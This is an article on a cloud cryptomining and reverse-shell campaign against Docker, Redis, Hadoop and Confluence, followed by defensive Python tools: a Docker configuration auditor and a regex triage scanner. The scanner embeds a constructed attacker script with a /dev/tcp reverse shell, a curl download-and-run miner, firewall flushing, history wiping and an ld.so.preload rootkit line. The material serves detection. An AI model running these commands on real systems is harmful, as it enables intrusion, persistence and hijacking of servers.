Researchers have identified a concerted compromise campaign targeting cloud servers running vulnerable or misconfigured instances of Apache Hadoop, Atlassian Confluence, Docker, and Redis. The attackers are dropping a cryptomining tool, but they are also installing a Linux-based reverse shell that would enable future attacks and further malware infections on the compromised hosts.
According to an analysis by Cado Security, in most cases the adversary is looking for common cloud misconfigurations to exploit. However, it also used an old remote code execution (RCE) vulnerability in Atlassian Confluence (CVE-2022-26134) in its current campaign.
The researchers also said that the attackers’ tactics overlap with TeamTNT and WatchDog, two threat groups known for targeting cloud and container environments.
“Attacks are relatively coded and automated, so they look for known vulnerabilities in Confluence and other platforms and well-known misconfigurations in platforms like Redis and Docker,” says Chris Doman, co-founder and CTO of Cado Security.
Finding these vulnerable instances is often simple for the attackers: mass scanning is the first step, and attacking whatever the scan turns up is the second. “Avoiding these problems often means fixing the problems at hand by making sure systems are patched or at least not accessible over the Internet,” Doman adds.
“Spinning YARN” cyberattacks target cloud servers
Cado Security researchers have nicknamed the campaign Spinning YARN, after the Apache Hadoop “Yet Another Resource Negotiator” (YARN) cluster resource management layer. They discovered it while investigating a flurry of initial access activity on one of Cado’s Docker honeypots. Their analysis led to the discovery of four previously unknown Golang binaries that the threat actor uses to automate the identification and compromise of hosts running the four services.
Cado researchers also found that the threat actor distributed several other unique payloads, including Platypus (an open source reverse shell utility used to maintain persistence) and two user-mode rootkits that hide malicious processes.
“Once initial access is gained, a number of shell scripts and general Linux attack techniques are used to deliver a cryptocurrency miner, generate a reverse shell, and allow persistent access to compromised hosts,” the company said in a blog post this week.
The ongoing campaign is the latest sign of the time and effort threat actors are dedicating to understanding vulnerabilities in Web-facing services in cloud environments and finding ways to exploit them for initial access, the security provider said. Since the start of 2024, Cado researchers have observed a total of three campaigns, including the latest, in which a threat actor leveraged Docker for initial access to an organization’s larger cloud environment, the company noted.
Many of these attacks have involved attempts to deploy cryptominers. Earlier this year, researchers at Aqua Nautilus reported a threat actor exploiting two known misconfigurations in Hadoop YARN and Apache Flink to deploy a miner for the Monero cryptocurrency. That campaign, like the one Cado reported this week, involved rootkits, system configuration changes, compressed (packed) ELF binaries, and other methods to evade detection. Last year, Aqua researchers discovered another campaign in which a threat actor infected over 1,200 Redis servers with a cryptominer via a nearly undetectable malware tool they dubbed “HeadCrab.”
In the cloud with a multi-stage attack chain
In the attack on Cado’s Docker honeypot, the threat actor issued a Docker command from a US IP address that spawned a new container whose configuration, a bind mount of the host’s filesystem, let the container read and write files and directories on the underlying host. It’s a method adversaries commonly use against exposed Docker APIs because it lets them write files to the host system, which amounts to remote code execution on the host, Cado said.
In this particular case, the attackers wrote a shell script that established contact with a remote command-and-control (C2) server and then retrieved a first-stage payload from it.
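As an added illustration (not Cado’s code or tooling), the following Python audit reads the JSON that `docker inspect` prints, or the body of a `POST /containers/create` request to the Docker API, and flags container configurations of the kind described above: bind mounts of sensitive host paths, `--privileged`, shared host namespaces, and dangerous added capabilities. The container names and settings in the embedded sample are constructed for this example.

```python
"""Audit Docker container configurations for host-escape patterns.

Added example, not Cado Security's code. Input is the JSON array printed by
`docker inspect <container>`; the fields used (HostConfig.Binds, .Mounts,
.Privileged, .PidMode, .NetworkMode, .CapAdd) are the real Docker API names.
The sample configurations at the bottom are constructed for this example.
"""
import json
from typing import Any

# Host paths that, once bind-mounted into a container, give root inside the
# container effective control of the host (read /etc/shadow, drop a cron job
# or SSH key, or talk to the Docker daemon itself).
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/home", "/var/run/docker.sock",
                        "/var/lib/docker", "/proc", "/sys", "/dev")

# Capabilities that hand over the host even without a bind mount.
DANGEROUS_CAPS = {"SYS_ADMIN", "SYS_MODULE", "SYS_PTRACE", "SYS_RAWIO", "ALL"}


def _normalize(path: str) -> str:
    """Collapse trailing slashes on absolute paths; leave volume names alone."""
    if not path.startswith("/"):
        return path  # a named volume or relative path, not a host path
    stripped = path.rstrip("/")
    return stripped or "/"


def _host_path_is_sensitive(host_path: str) -> bool:
    host_path = _normalize(host_path)
    if host_path == "/":
        return True
    return any(host_path == p or host_path.startswith(p + "/")
               for p in SENSITIVE_HOST_PATHS if p != "/")


def audit_container(config: dict[str, Any]) -> list[str]:
    """Return human-readable findings; an empty list means nothing suspicious."""
    findings: list[str] = []
    host = config.get("HostConfig", {})

    # 1. Classic -v binds: "host:container[:opts]" strings under HostConfig.Binds.
    for bind in host.get("Binds") or []:
        parts = bind.split(":")
        if len(parts) < 2:
            continue
        host_path, container_path = parts[0], parts[1]
        opts = parts[2].split(",") if len(parts) > 2 else []
        if _host_path_is_sensitive(host_path):
            mode = "read-only" if "ro" in opts else "writable"
            findings.append(f"sensitive host path {host_path!r} bind-mounted at "
                            f"{container_path!r} ({mode})")

    # 2. --mount syntax lands in HostConfig.Mounts as objects.
    for mnt in host.get("Mounts") or []:
        if mnt.get("Type") == "bind" and _host_path_is_sensitive(mnt.get("Source", "")):
            findings.append(f"sensitive host path {mnt['Source']!r} mounted at "
                            f"{mnt.get('Target')!r}")

    # 3. Isolation knobs that legitimate workloads almost never need.
    if host.get("Privileged"):
        findings.append("container runs --privileged (all capabilities, all devices)")
    if host.get("PidMode") == "host":
        findings.append("shares the host PID namespace (can inspect/ptrace host processes)")
    if host.get("NetworkMode") == "host":
        findings.append("shares the host network namespace")
    caps = {c.upper().removeprefix("CAP_") for c in (host.get("CapAdd") or [])}
    for cap in sorted(caps & DANGEROUS_CAPS):
        findings.append(f"adds capability {cap}")

    return findings


def audit_inspect_output(raw_json: str) -> dict[str, list[str]]:
    """Run audit_container over the array `docker inspect` prints, keyed by name."""
    return {c.get("Name", "?").lstrip("/"): audit_container(c)
            for c in json.loads(raw_json)}


# Constructed sample: one container shaped like the honeypot hit described in
# the article (host root bind-mounted, writable) and one ordinary web container.
SAMPLE_INSPECT = json.dumps([
    {"Name": "/elegant_hopper",
     "Config": {"Image": "alpine", "Cmd": ["/bin/sh"]},
     "HostConfig": {"Binds": ["/:/mnt"], "Privileged": False}},
    {"Name": "/web",
     "Config": {"Image": "nginx:1.25"},
     "HostConfig": {"Binds": ["/srv/www:/usr/share/nginx/html:ro"], "Privileged": False}},
])

if __name__ == "__main__":
    for name, findings in audit_inspect_output(SAMPLE_INSPECT).items():
        print(f"{name}: {'SUSPICIOUS' if findings else 'ok'}")
        for finding in findings:
            print("  -", finding)
```

On a live host, pipe `docker inspect $(docker ps -aq)` into `audit_inspect_output`; the same checks can be applied to container-create events from the Docker daemon’s audit or event log, which is where a compromise through an exposed Docker API first becomes visible.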
The first-stage payload defines the C2 used for additional payloads and checks for chattr, the Linux tool for changing file attributes such as the immutable bit, which prevents a file from being modified even by root. If the tool is present, the payload renames it; otherwise the malware installs chattr on the compromised system and then renames it, Cado said. The first-stage payload then checks whether the current user has root access and fetches the next payload.
The second-stage payload softens the system for further compromise by, among other things, executing commands to disable firewall and IP filtering (iptables) rules, clearing shell history, disabling mandatory access control mechanisms such as SELinux and AppArmor, and removing any restrictions on outgoing DNS requests.
The second-stage shell script also takes various anti-forensic measures, such as installing two user-mode rootkits to hide malicious activity and ensuring that malicious commands do not appear in the shell history file. It also downloads Platypus for persistent access and the XMRig cryptominer to mine Monero.
The attack chain also includes shell scripts that search for and delete Docker images based on Ubuntu or Alpine, and that download and persist numerous other binary payloads on compromised systems.
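The first- and second-stage behaviors described above (renaming chattr, tearing down the firewall, clearing history, disabling SELinux/AppArmor, tampering with DNS settings, installing an LD_PRELOAD rootkit, dropping a miner and a reverse shell) can be triaged statically once a dropped script is recovered from a host or a honeypot. The following Python rule set is an added example, not Cado’s tooling: the patterns are generic matches for standard Linux commands, and the embedded sample script and its 203.0.113.x addresses are constructed for this example, not indicators from the campaign.

```python
"""Static triage of a dropped Linux shell script for second-stage behaviours.

Added example, not Cado Security's tooling. RULES maps a behaviour label to
regexes for the usual commands that achieve it; a script hitting several
labels is far more likely to be attacker tooling than an untidy admin script
hitting one. The sample script below is constructed (TEST-NET addresses).
"""
import re

RULES: dict[str, list[re.Pattern[str]]] = {
    "firewall_disabled": [
        re.compile(r"\biptables\s+(-F|--flush)\b"),
        re.compile(r"\bnft\s+flush\s+ruleset\b"),
        re.compile(r"\bufw\s+disable\b"),
        re.compile(r"\bsystemctl\s+(stop|disable)\s+(firewalld|iptables|ufw)\b"),
    ],
    "history_tampering": [
        re.compile(r"\bhistory\s+-c\b"),
        re.compile(r"\bunset\s+HISTFILE\b"),
        re.compile(r"\bHISTFILE=/dev/null\b"),
        re.compile(r"\bHISTSIZE=0\b"),
    ],
    "mac_disabled": [                       # SELinux / AppArmor switched off
        re.compile(r"\bsetenforce\s+0\b"),
        re.compile(r"\bsystemctl\s+(stop|disable)\s+apparmor\b"),
        re.compile(r"\baa-teardown\b"),
    ],
    "dns_tampering": [
        re.compile(r"/etc/resolv\.conf"),
        re.compile(r"\biptables\b.*--dport\s+53\b"),
    ],
    "chattr_abuse": [
        re.compile(r"\bchattr\s+-[a-zA-Z]*i"),   # strip the immutable bit
        re.compile(r"\b(mv|cp)\s+\S*/chattr\b"), # rename the binary away
    ],
    "preload_rootkit": [
        re.compile(r"/etc/ld\.so\.preload"),
        re.compile(r"\bLD_PRELOAD="),
    ],
    "cryptominer": [
        re.compile(r"\bxmrig\b", re.I),
        re.compile(r"stratum\+(tcp|ssl)://"),
        re.compile(r"--donate-level\b"),
    ],
    "reverse_shell": [
        re.compile(r"/dev/tcp/\d"),
        re.compile(r"\bnc\b.*\s-e\s+/bin/(ba)?sh\b"),
    ],
}


def triage_script(text: str) -> dict[str, list[tuple[int, str]]]:
    """Return {label: [(line_no, line), ...]} for every rule that fires.

    Comment-only lines are skipped so annotations cannot trigger rules;
    a single line may contribute to several labels.
    """
    hits: dict[str, list[tuple[int, str]]] = {}
    for no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        for label, patterns in RULES.items():
            if any(p.search(line) for p in patterns):
                hits.setdefault(label, []).append((no, line))
    return hits


def verdict(hits: dict[str, list[tuple[int, str]]]) -> str:
    """Crude severity based on how many distinct behaviours appear."""
    n = len(hits)
    return "malicious" if n >= 4 else "suspicious" if n >= 2 else "benign"


# Constructed sample modelled on the behaviours described in the article.
SAMPLE_SCRIPT = r"""#!/bin/bash
# constructed second-stage sample; 203.0.113.0/24 is a documentation range
export HISTFILE=/dev/null
history -c
setenforce 0 2>/dev/null
systemctl stop apparmor 2>/dev/null
ufw disable 2>/dev/null
iptables -F
iptables -D OUTPUT -p udp --dport 53 -j DROP 2>/dev/null
chattr -i /etc/resolv.conf
echo "nameserver 203.0.113.53" > /etc/resolv.conf
mv /usr/bin/chattr /usr/bin/.ch
echo /usr/local/lib/libhide.so > /etc/ld.so.preload
curl -fsSL http://203.0.113.5/xmrig -o /tmp/.x && chmod +x /tmp/.x
nohup /tmp/.x -o stratum+tcp://203.0.113.5:3333 --donate-level 0 >/dev/null 2>&1 &
bash -i >& /dev/tcp/203.0.113.5/4444 0>&1 &
"""

if __name__ == "__main__":
    found = triage_script(SAMPLE_SCRIPT)
    print("verdict:", verdict(found))
    for label, lines in found.items():
        print(f"{label}: lines {[no for no, _ in lines]}")
```

Note the limit this example makes visible: once chattr has been renamed (the `mv /usr/bin/chattr` line), later invocations of the renamed copy no longer match any `chattr` pattern, which is one reason the rename is attractive to the attacker. On the host itself, the complementary checks are an unexpected executable in `/usr/bin` with chattr’s size and hash, a populated `/etc/ld.so.preload`, and an empty or disabled shell history for root.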